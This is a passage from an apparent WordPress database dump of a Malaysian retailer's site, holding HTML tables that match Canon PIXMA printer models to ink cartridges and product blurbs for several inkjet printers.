(Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:56:01','2019-09-24 07:56:01','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3299,1,'2019-09-24 16:04:38','2019-09-24 08:04:38','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" 